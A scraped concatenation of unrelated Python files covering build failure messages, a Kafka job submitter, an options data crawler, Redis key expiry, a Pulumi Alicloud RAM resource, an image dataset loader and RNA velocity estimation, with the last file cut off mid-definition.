# -*- coding: utf-8 -*- # Copyright 2017 The Chromium OS Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Module to manage failure message of builds.""" from __future__ import print_function import sys from chromite.lib import failure_message_lib assert sys.version_info >= (3, 6), 'This module requires Python 3.6+' class BuildFailureMessage(object): """Message indicating that changes failed to be validated. A failure message for a failed build, which is used to trige failures and detect bad changes. """ def __init__(self, message_summary, failure_messages, internal, reason, builder): """Create a BuildFailureMessage instance. Args: message_summary: The message summary string to print. failure_messages: A list of failure messages (instances of StageFailureMessage), if any. internal: Whether this failure occurred on an internal builder. reason: A string describing the failure. builder: The builder the failure occurred on. """ self.message_summary = str(message_summary) self.failure_messages = failure_messages or [] self.internal = bool(internal) self.reason = str(reason) # builder should match build_config, e.g. self._run.config.name. self.builder = str(builder) def __str__(self): return self.message_summary def BuildFailureMessageToStr(self): """Return a string presenting the information in the BuildFailureMessage.""" to_str = ('[builder] %s [message summary] %s [reason] %s [internal] %s\n' % (self.builder, self.message_summary, self.reason, self.internal)) for f in self.failure_messages: to_str += '[failure message] ' + str(f) + '\n' return to_str def MatchesExceptionCategories(self, exception_categories): """Check if all of the failure_messages match the exception_categories. Args: exception_categories: A set of exception categories (members of constants.EXCEPTION_CATEGORY_ALL_CATEGORIES). Returns: True if all of the failure_messages match a member in exception_categories; else, False. """ for failure in self.failure_messages: if failure.exception_category not in exception_categories: if (isinstance(failure, failure_message_lib.CompoundFailureMessage) and failure.MatchesExceptionCategories(exception_categories)): continue else: return False return True def HasExceptionCategories(self, exception_categories): """Check if any of the failure_messages match the exception_categories. Args: exception_categories: A set of exception categories (members of constants.EXCEPTION_CATEGORY_ALL_CATEGORIES). Returns: True if any of the failure_messages match a member in exception_categories; else, False. """ for failure in self.failure_messages: if failure.exception_category in exception_categories: return True if (isinstance(failure, failure_message_lib.CompoundFailureMessage) and failure.HasExceptionCategories(exception_categories)): return True return False
nilq/baby-python
python
''' this file contains time tests for scanner algorithms ''' from FreeAndSimpleScanner import * import unittest from time import time from random import uniform class AreaScannerMethodsTest(unittest.TestCase): @staticmethod def used_regions_sample(): usedRegions = [((5.5, 1), (7.5, 4)), ((1, 5.5), (3.5, 7.5))] return usedRegions @staticmethod def test_AreaScanner_scan_n_objects_for_time(n = 20): ur = AreaScannerMethodsTest.used_regions_sample() gameboardDim = (8,8) t = time() for i in range(n): # get random region for dim (8,8) wr = FreeAndSimpleScanner.random_region_in_dimensions(gameboardDim) a = AreaScanner.sloppy_area_scan_mp(ur, 0.1, wr) print("AREA :\t", a) rt = time() - t print("runtime for scanning {} objects :\t{}".format(n, rt)) if __name__ == "__main__": #t() unittest.main()
nilq/baby-python
python
import yaml import json import numpy as np from json import dumps, loads from kafka import KafkaProducer, KafkaConsumer from fedrec.communications.messages import JobSubmitMessage from fedrec.utilities import registry with open("configs/dlrm_fl.yml", 'r') as cfg: config = yaml.load(cfg, Loader=yaml.FullLoader) def init_kafka(config): producer_url = "{}:{}".format( config["producer_url"], config["producer_port"]) return KafkaProducer( bootstrap_servers=[producer_url]) serializer = registry.construct("serializer", "json") # config = config["multiprocessing"]["communications"] producer = init_kafka(config["multiprocessing"]["communications"]) producer.send('job-request-trainer', value=serializer.serialize(JobSubmitMessage("test_run",[1,2],{},"id1","id2",None))) producer.send('job-request-aggregator', value=serializer.serialize(JobSubmitMessage("test_run",[1,2],{},"id1","id2",None))) with open("configs/dlrm_fl.yml", 'r') as cfg: config = yaml.load(cfg, Loader=yaml.FullLoader) ag_config = { # Seed for RNG used in shuffling the training data. "data_seed" : 100, # Seed for RNG used in initializing the model. "init_seed" : 100, # Seed for RNG used in computing the model's training loss. # Only relevant with internal randomness in the model, e.g. with dropout. "model_seed" : 100} from fedrec.python_executors.aggregator import Aggregator from fedrec.utilities.logger import NoOpLogger import experiments import fl_strategies agg = Aggregator(0, config, NoOpLogger()) st = agg.serialize() message = JobSubmitMessage("test_run",[1,2],{},"id1","id2",st) from fedrec.serialization.serializers import JobSubmitMessageSerializer pst1 = JobSubmitMessageSerializer.serialize(message) pst2 = JobSubmitMessageSerializer.serialize(message, file="/tmp/ser_des_test.pkl") m1 = JobSubmitMessageSerializer.deserialize(pst1) m2 = JobSubmitMessageSerializer.deserialize(pst2) assert len(pst1) > len(pst2) # Since the file has the pkl representation of the workerstate. assert isinstacnce(m1, JobSubmitMessage) assert isinstace(m2, JobSubmitMessage) assert m1.workerstate.__dict__['model'] m2_weight = np.array(m2.workerstate.state_dict["model"]["emb_l.0.weight"]) m1_weight = np.array(m1.workerstate.state_dict["model"]["emb_l.0.weight"]) assert np.all(m2_weight = m1_weight)
nilq/baby-python
python
import urllib.request import csv import datetime from requests import get import fcntl # expireDate # http://stock.finance.sina.com.cn/futures/api/openapi.php/StockOptionService.getRemainderDay?date=201706 # frontrow = [ # 'Date', 'ExpireDate', 'OptionType', 'Strike', 'Contract Name', 'Last', # 'Bid', 'Ask', 'Change', '%Change', 'Volume', 'OpenInterest', # 'ImpliedVolatility', 'UnderlyingPrice' # ] SINA_GET_STOCK_NAME = 'http://stock.finance.sina.com.cn/futures/api/openapi.php/StockOptionService.getStockName' SINA_GET_REMAINDER_DAY = 'http://stock.finance.sina.com.cn/futures/api/openapi.php/StockOptionService.getRemainderDay' SINA_JS_URL = 'http://hq.sinajs.cn/list=' # Following constant is not used anywhere, commented for now # frontrow = [ # 'RowID', 'Date', '买量', '买价bid', '最新价last', '卖价ask', '卖量', '振幅%change', '涨跌幅change', # '行权strike', '买量', '买价', '最新价', '卖价', '卖量', '振幅', '涨跌幅', '行权' # ] # TODO (chengcheng): For function match_twins, _get_paired_urls, _get_all_names, re_pair, etc. # We may need more details about the functionality in the doc, better with some examples, # or even better, giving more meaningful names. def _match_twins(year_month): suffix = '_510050' up_url = f'{SINA_JS_URL}OP_UP{suffix}{year_month}' down_url = f'{SINA_JS_URL}OP_DOWN{suffix}{year_month}' return _get_paired_urls([up_url, down_url]) def _get_paired_urls(twin_url_list: list) -> list: paired_stock_names = [] for url in twin_url_list: content = urllib.request.urlopen(url, None).read().decode('GBK') paired_stock_names.append(_get_all_names(content)) return _re_pair_stocks(paired_stock_names) def _get_all_names(content) -> list: content_start_position = content.find('"') + 1 stock_content = content[content_start_position:-3] stock_names = stock_content.split(',')[:-1] return stock_names def _re_pair_stocks(paired_urls) -> list: finished_pair = [] for index, item in enumerate(paired_urls[0]): finished_pair.append([item, paired_urls[1][index]]) return finished_pair def data_parser(double_query): row = [] for code in double_query: url = SINA_JS_URL + code data = urllib.request.urlopen(url, None).read().decode('GBK') params_start_position = data.find('=') + 2 params_seg = data[params_start_position:-3] params = params_seg.split(',') row.extend(params[0:8]) return row def _get_option_expiration_day(contract_month): """ Get option expiration dates :param string contract_month: string form like '201904' Example returned from sina API for '20190401': { "result": { "status": { "code": 0 }, "data": { "expireDay": "2019-04-24", "remainderDays": 2, "stockId": "510050", "cateId": "510050C1904", "zhulikanzhang": "", "zhulikandie": "" } } } Return format from this function: '2019-04-24' :return: string """ contract_date = '?date={month}01'.format(month=contract_month) expiration_date = get(SINA_GET_REMAINDER_DAY + contract_date).json()['result']['data']['expireDay'] return expiration_date def _get_option_contract_months(): """ Get option months, so that we don't need a loop from 1 to 12 Example returned from sina API: { "result": { "status": { "code": 0 }, "data": { "cateList": ["50ETF","50ETF"], "contractMonth": ["2019-04","2019-04","2019-05","2019-06","2019-09"], "stockId":"510050", "cateId":"510050C1906A02350" } } } Return format from this function: ['201904', '201905', '201906', '201909'] :return: list """ dates = get(SINA_GET_STOCK_NAME).json()['result']['data']['contractMonth'] return [''.join(i.split('-')) for i in dates[1:]] def write_data_to_csv(): """ Main entry of the crawler TODO: consider how do we want to run this? One-time, cron or service? :return: n/a """ start_time = datetime.datetime.now() with open('sina_stock_data.csv', 'w', newline='') as target_csv: fcntl.flock(target_csv.fileno(), fcntl.LOCK_EX) # Add write lock here print(f'Lock the file to write at {start_time}') writer = csv.writer(target_csv, delimiter=',') option_contract_months = _get_option_contract_months() print(f'Contract months: {option_contract_months}') for contract_month in option_contract_months: expiration_date = _get_option_expiration_day(contract_month) print(f'Start writing data for month {contract_month[4:]}') for pairs in _match_twins(contract_month[2:]): option_item_within_strike = data_parser(pairs) row_id = expiration_date + '-' + str(option_item_within_strike[7]) # date + strike as row_id writer.writerow([row_id] + [expiration_date] + option_item_within_strike) print(f'Done with data for month {contract_month[4:]}') end_time = datetime.datetime.now() print('Release the lock at {end_time}, the program takes: {runtime} sec'.format( end_time=end_time, runtime=(end_time - start_time).seconds) ) if __name__ == '__main__': write_data_to_csv()
nilq/baby-python
python
#!/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import (division, print_function, absolute_import, unicode_literals) import logging from itertools import imap from osrc.database import get_pipeline, format_key # The default time-to-live for every key. DEFAULT_TTL = 2 * 7 * 24 * 60 * 60 TEMP_TTL = 24 * 60 * 60 def set_expire(): pipe = get_pipeline() # Get the list of all keys. keys = pipe.keys().execute()[0] n = float(len(keys)) print("Found {0:.0f} keys".format(n)) # Loop over the keys and deal with each one. for i, key in enumerate(keys): # Skip the opt-out keys. if key.endswith(":optout"): continue # Deal with temporary keys. if any(imap(key.endswith, [":name", ":etag", ":gravatar", ":tz"])): pipe.expire(key, TEMP_TTL) continue # Everything else should get the default TTL. pipe.expire(key, DEFAULT_TTL) # Execute the updates in batches. if (i+1) % 5000 == 0: print("Finished {0} keys [{1:.2f} %]".format(i+1, (i+1)/n*100)) pipe.execute() pipe.execute() def del_connections(): pipe = get_pipeline() # Get the list of all keys. keys = pipe.keys(format_key("social:connection:*")).execute()[0] n = float(len(keys)) print("Found {0:.0f} keys".format(n)) # Loop over the keys and deal with each one. for i, key in enumerate(keys): pipe.delete(key) pipe.execute() if __name__ == "__main__": import argparse from osrc import create_app # Parse the command line arguments. parser = argparse.ArgumentParser( description="Add expiry dates to everything") parser.add_argument("--config", default=None, help="The path to the local configuration file.") parser.add_argument("--log", default=None, help="The path to the log file.") parser.add_argument("--connections", action="store_true", help="Delete the connections?") args = parser.parse_args() largs = dict(level=logging.INFO, format="[%(asctime)s] %(name)s:%(levelname)s:%(message)s") if args.log is not None: largs["filename"] = args.log logging.basicConfig(**largs) # Initialize a flask app. app = create_app(args.config) # Set up the app in a request context. with app.test_request_context(): if args.connections: del_connections() else: set_expire()
nilq/baby-python
python
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from .. import _utilities __all__ = ['RolePolicyAttachmentArgs', 'RolePolicyAttachment'] @pulumi.input_type class RolePolicyAttachmentArgs: def __init__(__self__, *, policy_name: pulumi.Input[str], policy_type: pulumi.Input[str], role_name: pulumi.Input[str]): """ The set of arguments for constructing a RolePolicyAttachment resource. :param pulumi.Input[str] policy_name: Name of the RAM policy. This name can have a string of 1 to 128 characters, must contain only alphanumeric characters or hyphen "-", and must not begin with a hyphen. :param pulumi.Input[str] policy_type: Type of the RAM policy. It must be `Custom` or `System`. :param pulumi.Input[str] role_name: Name of the RAM Role. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen. """ pulumi.set(__self__, "policy_name", policy_name) pulumi.set(__self__, "policy_type", policy_type) pulumi.set(__self__, "role_name", role_name) @property @pulumi.getter(name="policyName") def policy_name(self) -> pulumi.Input[str]: """ Name of the RAM policy. This name can have a string of 1 to 128 characters, must contain only alphanumeric characters or hyphen "-", and must not begin with a hyphen. """ return pulumi.get(self, "policy_name") @policy_name.setter def policy_name(self, value: pulumi.Input[str]): pulumi.set(self, "policy_name", value) @property @pulumi.getter(name="policyType") def policy_type(self) -> pulumi.Input[str]: """ Type of the RAM policy. It must be `Custom` or `System`. """ return pulumi.get(self, "policy_type") @policy_type.setter def policy_type(self, value: pulumi.Input[str]): pulumi.set(self, "policy_type", value) @property @pulumi.getter(name="roleName") def role_name(self) -> pulumi.Input[str]: """ Name of the RAM Role. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen. """ return pulumi.get(self, "role_name") @role_name.setter def role_name(self, value: pulumi.Input[str]): pulumi.set(self, "role_name", value) @pulumi.input_type class _RolePolicyAttachmentState: def __init__(__self__, *, policy_name: Optional[pulumi.Input[str]] = None, policy_type: Optional[pulumi.Input[str]] = None, role_name: Optional[pulumi.Input[str]] = None): """ Input properties used for looking up and filtering RolePolicyAttachment resources. :param pulumi.Input[str] policy_name: Name of the RAM policy. This name can have a string of 1 to 128 characters, must contain only alphanumeric characters or hyphen "-", and must not begin with a hyphen. :param pulumi.Input[str] policy_type: Type of the RAM policy. It must be `Custom` or `System`. :param pulumi.Input[str] role_name: Name of the RAM Role. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen. """ if policy_name is not None: pulumi.set(__self__, "policy_name", policy_name) if policy_type is not None: pulumi.set(__self__, "policy_type", policy_type) if role_name is not None: pulumi.set(__self__, "role_name", role_name) @property @pulumi.getter(name="policyName") def policy_name(self) -> Optional[pulumi.Input[str]]: """ Name of the RAM policy. This name can have a string of 1 to 128 characters, must contain only alphanumeric characters or hyphen "-", and must not begin with a hyphen. """ return pulumi.get(self, "policy_name") @policy_name.setter def policy_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "policy_name", value) @property @pulumi.getter(name="policyType") def policy_type(self) -> Optional[pulumi.Input[str]]: """ Type of the RAM policy. It must be `Custom` or `System`. """ return pulumi.get(self, "policy_type") @policy_type.setter def policy_type(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "policy_type", value) @property @pulumi.getter(name="roleName") def role_name(self) -> Optional[pulumi.Input[str]]: """ Name of the RAM Role. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen. """ return pulumi.get(self, "role_name") @role_name.setter def role_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "role_name", value) class RolePolicyAttachment(pulumi.CustomResource): @overload def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, policy_name: Optional[pulumi.Input[str]] = None, policy_type: Optional[pulumi.Input[str]] = None, role_name: Optional[pulumi.Input[str]] = None, __props__=None): """ Provides a RAM Role attachment resource. ## Example Usage ```python import pulumi import pulumi_alicloud as alicloud # Create a RAM Role Policy attachment. role = alicloud.ram.Role("role", document=\"\"\" { "Statement": [ { "Action": "sts:AssumeRole", "Effect": "Allow", "Principal": { "Service": [ "apigateway.aliyuncs.com", "ecs.aliyuncs.com" ] } } ], "Version": "1" } \"\"\", description="this is a role test.", force=True) policy = alicloud.ram.Policy("policy", document=\"\"\" { "Statement": [ { "Action": [ "oss:ListObjects", "oss:GetObject" ], "Effect": "Allow", "Resource": [ "acs:oss:*:*:mybucket", "acs:oss:*:*:mybucket/*" ] } ], "Version": "1" } \"\"\", description="this is a policy test", force=True) attach = alicloud.ram.RolePolicyAttachment("attach", policy_name=policy.name, policy_type=policy.type, role_name=role.name) ``` ## Import RAM Role Policy attachment can be imported using the id, e.g. ```sh $ pulumi import alicloud:ram/rolePolicyAttachment:RolePolicyAttachment example role:my-policy:Custom:my-role ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] policy_name: Name of the RAM policy. This name can have a string of 1 to 128 characters, must contain only alphanumeric characters or hyphen "-", and must not begin with a hyphen. :param pulumi.Input[str] policy_type: Type of the RAM policy. It must be `Custom` or `System`. :param pulumi.Input[str] role_name: Name of the RAM Role. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen. """ ... @overload def __init__(__self__, resource_name: str, args: RolePolicyAttachmentArgs, opts: Optional[pulumi.ResourceOptions] = None): """ Provides a RAM Role attachment resource. ## Example Usage ```python import pulumi import pulumi_alicloud as alicloud # Create a RAM Role Policy attachment. role = alicloud.ram.Role("role", document=\"\"\" { "Statement": [ { "Action": "sts:AssumeRole", "Effect": "Allow", "Principal": { "Service": [ "apigateway.aliyuncs.com", "ecs.aliyuncs.com" ] } } ], "Version": "1" } \"\"\", description="this is a role test.", force=True) policy = alicloud.ram.Policy("policy", document=\"\"\" { "Statement": [ { "Action": [ "oss:ListObjects", "oss:GetObject" ], "Effect": "Allow", "Resource": [ "acs:oss:*:*:mybucket", "acs:oss:*:*:mybucket/*" ] } ], "Version": "1" } \"\"\", description="this is a policy test", force=True) attach = alicloud.ram.RolePolicyAttachment("attach", policy_name=policy.name, policy_type=policy.type, role_name=role.name) ``` ## Import RAM Role Policy attachment can be imported using the id, e.g. ```sh $ pulumi import alicloud:ram/rolePolicyAttachment:RolePolicyAttachment example role:my-policy:Custom:my-role ``` :param str resource_name: The name of the resource. :param RolePolicyAttachmentArgs args: The arguments to use to populate this resource's properties. :param pulumi.ResourceOptions opts: Options for the resource. """ ... def __init__(__self__, resource_name: str, *args, **kwargs): resource_args, opts = _utilities.get_resource_args_opts(RolePolicyAttachmentArgs, pulumi.ResourceOptions, *args, **kwargs) if resource_args is not None: __self__._internal_init(resource_name, opts, **resource_args.__dict__) else: __self__._internal_init(resource_name, *args, **kwargs) def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, policy_name: Optional[pulumi.Input[str]] = None, policy_type: Optional[pulumi.Input[str]] = None, role_name: Optional[pulumi.Input[str]] = None, __props__=None): if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = RolePolicyAttachmentArgs.__new__(RolePolicyAttachmentArgs) if policy_name is None and not opts.urn: raise TypeError("Missing required property 'policy_name'") __props__.__dict__["policy_name"] = policy_name if policy_type is None and not opts.urn: raise TypeError("Missing required property 'policy_type'") __props__.__dict__["policy_type"] = policy_type if role_name is None and not opts.urn: raise TypeError("Missing required property 'role_name'") __props__.__dict__["role_name"] = role_name super(RolePolicyAttachment, __self__).__init__( 'alicloud:ram/rolePolicyAttachment:RolePolicyAttachment', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None, policy_name: Optional[pulumi.Input[str]] = None, policy_type: Optional[pulumi.Input[str]] = None, role_name: Optional[pulumi.Input[str]] = None) -> 'RolePolicyAttachment': """ Get an existing RolePolicyAttachment resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] policy_name: Name of the RAM policy. This name can have a string of 1 to 128 characters, must contain only alphanumeric characters or hyphen "-", and must not begin with a hyphen. :param pulumi.Input[str] policy_type: Type of the RAM policy. It must be `Custom` or `System`. :param pulumi.Input[str] role_name: Name of the RAM Role. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen. """ opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = _RolePolicyAttachmentState.__new__(_RolePolicyAttachmentState) __props__.__dict__["policy_name"] = policy_name __props__.__dict__["policy_type"] = policy_type __props__.__dict__["role_name"] = role_name return RolePolicyAttachment(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter(name="policyName") def policy_name(self) -> pulumi.Output[str]: """ Name of the RAM policy. This name can have a string of 1 to 128 characters, must contain only alphanumeric characters or hyphen "-", and must not begin with a hyphen. """ return pulumi.get(self, "policy_name") @property @pulumi.getter(name="policyType") def policy_type(self) -> pulumi.Output[str]: """ Type of the RAM policy. It must be `Custom` or `System`. """ return pulumi.get(self, "policy_type") @property @pulumi.getter(name="roleName") def role_name(self) -> pulumi.Output[str]: """ Name of the RAM Role. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen. """ return pulumi.get(self, "role_name")
nilq/baby-python
python
# _*_coding:utf-8_*_ # @auther:FelixFu # @Date: 2021.4.14 # @github:https://github.com/felixfu520 import numpy as np import os import cv2 from base import BaseDataSet, BaseDataLoader class BDDDataset(BaseDataSet): def __init__(self, **kwargs): self.num_classes = 29 super(BDDDataset, self).__init__(**kwargs) def _set_files(self): """获取所有文件的文件名和标签 """ if self.val: list_path = os.path.join(self.root, "testlist.txt") else: list_path = os.path.join(self.root, "trainlist.txt") images, labels = [], [] with open(list_path, 'r', encoding='utf-8') as images_labels: for image_label in images_labels: images.append(image_label.split(",,,")[0]) labels.append(image_label.split(",,,")[1]) self.files = list(zip(images, labels)) def _load_data(self, index): """通过文件名获得,图片和类别 :param index: :return: ndarray """ image_path, label = self.files[index] # image_path = image_path.encode('utf8', errors='surrogateescape').decode('utf-8') if self.in_channels == 1: # 修改支持中文路径 img = cv2.imdecode(np.fromfile(image_path.encode('utf8'), dtype=np.uint8), cv2.IMREAD_GRAYSCALE) elif self.in_channels == 3: img = cv2.imdecode(np.fromfile(image_path.encode('utf8'), dtype=np.uint8), cv2.IMREAD_COLOR) return img, label, image_path class BDD(BaseDataLoader): def __init__(self, data_dir, base_size=None, crop_size=None, augment=False, scale=True, flip=False, rotate=False, blur=False, histogram=False, batch_size=1, num_workers=1, shuffle=False, in_channels=3, val=False): if in_channels == 3: self.MEAN = [0.45734706, 0.43338275, 0.40058118] # mean & std在不同数据集上要不同,每个数据集算一次,不能复用 self.STD = [0.23965294, 0.23532275, 0.2398498] else: self.MEAN = [0.6790830900388274] # [0.3858034032292721] self.STD = [0.25241563832076486] # [0.12712721340420535] kwargs = { 'root': data_dir, 'mean': self.MEAN, 'std': self.STD, 'augment': augment, 'crop_size': crop_size, 'base_size': base_size, 'scale': scale, 'flip': flip, 'blur': blur, 'rotate': rotate, 'histogram': histogram, 'in_channels': in_channels, 'val': val } self.dataset = BDDDataset(**kwargs) super(BDD, self).__init__(self.dataset, batch_size, shuffle, num_workers)
nilq/baby-python
python
import numpy as np from scipy.optimize import least_squares from sklearn.cluster import KMeans from sklearn.neighbors import NearestNeighbors def sol_u(t, u0, alpha, beta): return u0*np.exp(-beta*t) + alpha/beta*(1-np.exp(-beta*t)) def sol_s(t, s0, u0, alpha, beta, gamma): exp_gt = np.exp(-gamma*t) if beta == gamma: s = s0*exp_gt + (beta*u0-alpha)*t*exp_gt + alpha/gamma * (1-exp_gt) else: s = s0*exp_gt + alpha/gamma * (1-exp_gt) + (alpha - u0*beta)/(gamma-beta) * (exp_gt - np.exp(-beta*t)) return s def sol_p(t, p0, s0, u0, alpha, beta, gamma, eta, gamma_p): u = sol_u(t, u0, alpha, beta) s = sol_s(t, s0, u0, alpha, beta, gamma) exp_gt = np.exp(-gamma_p*t) p = p0*exp_gt + eta/(gamma_p-gamma)*(s-s0*exp_gt - beta/(gamma_p-beta)*(u-u0*exp_gt-alpha/gamma_p*(1-exp_gt))) return p, s, u def fit_linreg(x, y, intercept=True): mask = np.logical_and(~np.isnan(x), ~np.isnan(y)) xx = x[mask] yy = y[mask] ym = np.mean(yy) xm = np.mean(xx) if intercept: cov = np.mean(xx * yy) - xm * ym var_x = np.mean(xx * xx) - xm * xm k = cov / var_x b = ym - k * xm else: k = np.mean(yy) / np.mean(xx) b = 0 return k, b def fit_beta_lsq(t, l, bounds=(0, np.inf), fix_l0=False, beta_0=None): tau = t - np.min(t) l0 = np.mean(l[:, tau == 0]) if beta_0 is None: beta_0 = 1 if fix_l0: f_lsq = lambda b: (sol_u(tau, l0, 0, b) - l).flatten() ret = least_squares(f_lsq, beta_0, bounds=bounds) beta = ret.x else: f_lsq = lambda p: (sol_u(tau, p[1], 0, p[0]) - l).flatten() ret = least_squares(f_lsq, np.array([beta_0, l0]), bounds=bounds) beta = ret.x[0] l0 = ret.x[1] return beta, l0 def fit_gamma_lsq(t, s, beta, u0, bounds=(0, np.inf), fix_s0=False): tau = t - np.min(t) s0 = np.mean(s[:, tau == 0]) g0 = beta * u0/s0 if fix_s0: f_lsq = lambda g: (sol_s(tau, s0, u0, 0, beta, g) - s).flatten() ret = least_squares(f_lsq, g0, bounds=bounds) gamma = ret.x else: f_lsq = lambda p: (sol_s(tau, p[1], u0, 0, beta, p[0]) - s).flatten() ret = least_squares(f_lsq, np.array([g0, s0]), bounds=bounds) gamma = ret.x[0] s0 = ret.x[1] return gamma, s0 def fit_alpha_synthesis(t, u, beta): # fit alpha assuming u=0 at t=0 expt = np.exp(-beta*t) # prepare x x = 1 - expt return beta * np.mean(u) / np.mean(x) def fit_alpha_degradation(t, u, beta, mode=None): n = u.size tau = t - np.min(t) expt = np.exp(beta*tau) # prepare x x = expt - 1 xm = np.mean(x) # prepare y y = u * expt ym = np.mean(y) # calculate slope var_x = np.mean(x**2) - xm**2 cov = np.sum(y.dot(x)) / n - ym * xm k = cov / var_x # calculate intercept b = ym - k * xm if mode != 'fast' else None return k * beta, b class velocity: def __init__(self, alpha=None, beta=None, gamma=None, eta=None, delta=None, estimation=None): if estimation is not None: self.parameters = {} self.parameters['alpha'] = estimation.parameters['alpha'] self.parameters['beta'] = estimation.parameters['beta'] self.parameters['gamma'] = estimation.parameters['gamma'] self.parameters['eta'] = estimation.parameters['eta'] self.parameters['delta'] = estimation.parameters['delta'] else: self.parameters = {'alpha': alpha, 'beta': beta, 'gamma': gamma, 'eta': eta, 'delta': delta} def vel_u(self, U): if self.parameters['alpha'] is not None and self.parameters['beta'] is not None: V = self.parameters['alpha'] - (self.parameters['beta'] * U.T).T else: V = np.nan return V def vel_s(self, U, S): if self.parameters['beta'] is not None and self.parameters['gamma'] is not None: V = self.parameters['beta'] * U.T - self.parameters['gamma'] * S.T V = V.T else: V = np.nan return V def vel_p(self, S, P): if self.parameters['eta'] is not None and self.parameters['delta'] is not None: V = self.parameters['eta'] * S.T - self.parameters['delta'] * P.T V = V.T else: V = np.nan return V def get_n_cells(self): if self.parameters['alpha'] is not None: n_cells = self.parameters['alpha'].shape[1] else: n_cells = np.nan return n_cells def get_n_genes(self): if self.parameters['alpha'] is not None: n_genes = self.parameters['alpha'].shape[0] else: n_genes = np.nan return n_genes class estimation: def __init__(self, U=None, Ul=None, S=None, Sl=None, P=None, t=None, experiment_type='deg', assumption_mRNA=None, assumption_protein='ss'): self.t = t self.data = {'uu': U, 'ul': Ul, 'su': S, 'sl': Sl, 'p': P} self.extyp = experiment_type self.asspt_mRNA = assumption_mRNA self.asspt_prot = assumption_protein self.parameters = {'alpha': None, 'beta': None, 'gamma': None, 'eta': None, 'delta': None} def fit(self, intercept=True, perc_left=5, perc_right=5, clusters=None): n = self.get_n_genes() # fit mRNA if self.asspt_mRNA == 'ss': if np.all(self._exist_data('uu', 'su')): self.parameters['beta'] = np.ones(n) gamma = np.zeros(n) for i in range(n): U = self.data['uu'] if self.data['ul'] is None else self.data['uu'] + self.data['ul'] S = self.data['su'] if self.data['sl'] is None else self.data['su'] + self.data['sl'] gamma[i], _ = self.fit_gamma_steady_state(U, S, intercept, perc_left, perc_right) self.parameters['gamma'] = gamma else: if self.extyp == 'deg': if np.all(self._exist_data('ul', 'sl')): # beta & gamma estimation self.parameters['beta'], self.parameters['gamma'] = self.fit_beta_gamma_lsq(self.t, self.data['ul'], self.data['sl']) if self._exist_data('uu'): # alpha estimation alpha = np.zeros(n) for i in range(n): alpha[i], _ = fit_alpha_degradation(self.t, self.data['uu'][i], self.parameters['beta'][i], mode='fast') self.parameters['alpha'] = alpha elif self.extyp == 'kin': if self._exist_data('ul'): if not self._exist_parameter('beta'): # beta & gamma estimation: only works when there're at least 2 time points self.parameters['beta'], self.parameters['gamma'] = self.fit_beta_gamma_lsq(self.t, self.data['uu'], self.data['su']) # alpha estimation alpha = np.zeros_like(self.data['ul']) for i in range(n): for j in range(len(self.data['ul'][i])): alpha[i, j] = fit_alpha_synthesis(self.t, self.data['ul'][i], self.parameters['beta'][i]) self.parameters['alpha'] = alpha # 'one_shot' elif self.extyp == 'one_shot': if self._exist_data('ul') and self._exist_parameter('beta'): self.parameters['alpha'] = self.fit_alpha_oneshot(self.t, self.data['ul'], self.parameters['beta'], clusters) # fit protein if np.all(self._exist_data('p', 'su')): if self.asspt_prot == 'ss': self.parameters['eta'] = np.ones(n) delta = np.zeros(n) for i in range(n): s = self.data['su'][i] + self.data['sl'][i] if self._exist_data('sl') else self.data['su'][i] delta[i], _ = self.fit_gamma_steady_state(s, self.data['p'][i], intercept, perc_left, perc_right) self.parameters['delta'] = delta def fit_gamma_steady_state(self, u, s, intercept=True, perc_left=5, perc_right=5): n = len(u) i_left = np.int(perc_left/100.0*n) if perc_left is not None else n i_right = np.int((100-perc_right)/100.0*n) if perc_right is not None else 0 mask = np.zeros(n, dtype=bool) mask[:i_left] = mask[i_right:] = True return fit_linreg(s[mask], u[mask], intercept) def fit_beta_gamma_lsq(self, t, U, S): n = len(U) beta = np.zeros(n) gamma = np.zeros(n) for i in range(n): beta[i], u0 = fit_beta_lsq(t, U[i]) gamma[i], _ = fit_gamma_lsq(t, S[i], beta[i], u0) return beta, gamma def fit_alpha_oneshot(self, t, U, beta, clusters=None): n_genes, n_cells = U.shape if clusters is None: clusters = [[i] for i in range(n_cells)] alpha = np.zeros((n_genes, len(clusters))) for i, c in enumerate(clusters): for j in range(n_genes): if len(c) > 0: alpha[j, i] = fit_alpha_synthesis(t, U[j][c], beta[j]) else: alpha[j, i] = np.nan return alpha def get_n_genes(self): return len(self.data[self.get_exist_data_names()[0]]) def 